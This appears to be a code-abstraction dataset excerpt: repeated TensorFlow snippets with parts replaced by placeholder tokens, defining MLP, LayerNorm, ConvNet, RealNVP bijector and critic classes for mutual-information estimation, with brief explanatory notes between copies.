y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, 
-1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
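The LayerNorm class carried through this step normalises each example over a set of axes and then applies a per-channel scale and bias. Below is a minimal NumPy sketch of that computation; the fixed scale and bias values are illustrative assumptions standing in for trained weights.

# Sketch of layer normalisation over spatial/channel axes followed by a
# per-channel affine transform (normalise, then scale and shift).
import numpy as np

def layer_norm(x, scale, bias, axes=(1, 2, 3), epsilon=1e-6):
    mean = x.mean(axis=axes, keepdims=True)
    std = x.std(axis=axes, keepdims=True)
    norm = (x - mean) / (std + epsilon)
    return norm * scale + bias            # scale/bias broadcast over the channel axis

rng = np.random.default_rng(4)
x = rng.normal(loc=3.0, scale=2.0, size=(2, 14, 28, 8))   # (batch, H, W, C)
out = layer_norm(x, scale=np.ones(8), bias=np.zeros(8))
print(out.mean(), out.std())   # roughly 0 and 1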
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n <function token>\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = 
shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n 
scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
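The step entry above still contains the full ConcatCritic.call body, which scores every x_i against every y_j by tiling the two batches, concatenating them, and reshaping the result into a square score matrix. A minimal NumPy sketch of that pairwise-scoring pattern (function and variable names here are illustrative stand-ins, not the original TF code):

import numpy as np

def concat_critic_scores(x, y, score_fn):
    """x: [B, dx], y: [B, dy]; score_fn maps [N, dx + dy] -> [N, 1]."""
    b = x.shape[0]
    x_tiled = np.repeat(x[None, :, :], b, axis=0)   # [B, B, dx], element [i, j] = x_j
    y_tiled = np.repeat(y[:, None, :], b, axis=1)   # [B, B, dy], element [i, j] = y_i
    pairs = np.concatenate([x_tiled, y_tiled], axis=2).reshape(b * b, -1)
    scores = score_fn(pairs).reshape(b, b)
    return scores.T                                  # entry [i, j] now scores (x_i, y_j)

# toy usage with a random linear map standing in for the critic's MLP
rng = np.random.default_rng(0)
x, y = rng.normal(size=(4, 3)), rng.normal(size=(4, 5))
w = rng.normal(size=(8, 1))
print(concat_critic_scores(x, y, lambda p: p @ w).shape)   # (4, 4)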
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n <function token>\n <function token>\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n 
is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': 
activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
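The other critics kept in these entries (InnerProdCritic, BilinearCritic, SeparableCritic) all reduce to an inner product between possibly transformed representations, so they yield the same [batch, batch] score matrix without materialising every pair. A hedged NumPy sketch, with random matrices standing in for the learned Dense/MLP maps:

import numpy as np

rng = np.random.default_rng(1)
x = rng.normal(size=(4, 100))   # representation of one view
y = rng.normal(size=(4, 100))   # representation of the other view

inner_prod = x @ y.T                              # InnerProdCritic

W = rng.normal(size=(100, 100))
bilinear = x @ (y @ W.T).T                        # BilinearCritic: a learned bilinear form x W y^T

f_x = np.tanh(x @ rng.normal(size=(100, 32)))     # stand-ins for the two MLP feature maps
f_y = np.tanh(y @ rng.normal(size=(100, 32)))
separable = f_x @ f_y.T                           # SeparableCritic

print(inner_prod.shape, bilinear.shape, separable.shape)   # (4, 4) for all three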
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n <function token>\n <function token>\n <function token>\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth 
is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, 
y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
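The RealNVP methods preserved in this entry (_forward, _inverse and the two log-det-Jacobian helpers) implement the usual coupling pattern: the first num_masked dimensions pass through unchanged and parameterise an affine map of the remaining ones. The class itself delegates that map to a tensorflow_probability bijector; the sketch below only reproduces the arithmetic, assuming an exp(log_scale) scaling and a toy conditioner in place of shift_and_log_scale_fn:

import numpy as np

def coupling_forward(x, num_masked, cond):
    x0, x1 = x[..., :num_masked], x[..., num_masked:]
    shift, log_scale = cond(x0)
    return np.concatenate([x0, x1 * np.exp(log_scale) + shift], axis=-1)

def coupling_inverse(y, num_masked, cond):
    y0, y1 = y[..., :num_masked], y[..., num_masked:]
    shift, log_scale = cond(y0)
    return np.concatenate([y0, (y1 - shift) * np.exp(-log_scale)], axis=-1)

def coupling_fldj(x, num_masked, cond):
    _, log_scale = cond(x[..., :num_masked])
    return log_scale.sum(axis=-1)        # forward log|det J|; the inverse direction is its negation

rng = np.random.default_rng(2)
A, b = rng.normal(size=(3, 3)), rng.normal(size=3)
cond = lambda x0: (x0 @ A + b, np.tanh(x0 @ A))     # toy conditioner (shift, log_scale)
x = rng.normal(size=(5, 6))
y = coupling_forward(x, 3, cond)
assert np.allclose(coupling_inverse(y, 3, cond), x)
# y keeps x0 unchanged, so the log-det evaluated at y matches the one at x
assert np.allclose(coupling_fldj(y, 3, cond), coupling_fldj(x, 3, cond))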
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n 